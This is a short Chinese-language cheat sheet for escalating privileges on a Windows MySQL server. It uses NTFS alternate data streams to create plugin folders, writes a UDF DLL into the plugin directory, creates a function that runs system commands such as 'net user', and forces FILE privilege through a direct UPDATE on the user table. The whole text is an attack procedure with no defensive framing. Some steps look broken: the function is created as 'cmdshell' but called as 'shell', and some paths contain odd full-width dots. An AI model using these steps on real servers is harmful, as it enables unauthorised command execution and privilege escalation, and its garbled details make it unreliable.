1. select @@basedir;  #查看mysql安装目录
  2. select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录
  3. select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录
  4. select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll';  #导出udfcode,注意修改udfcode
  5. create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数,shell,sys_exec,sys_eval
  6. select shell('cmd','net user');     #执行cmd命令
  7. show variables like '%plugin%';     #查看plugin路径

小技巧:

  1. 1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
  2. 2.my.inidatadir的值是数据存放目录
  3. 3.UPDATE user set File_priv ='Y';  flush privileges; 强制加file权限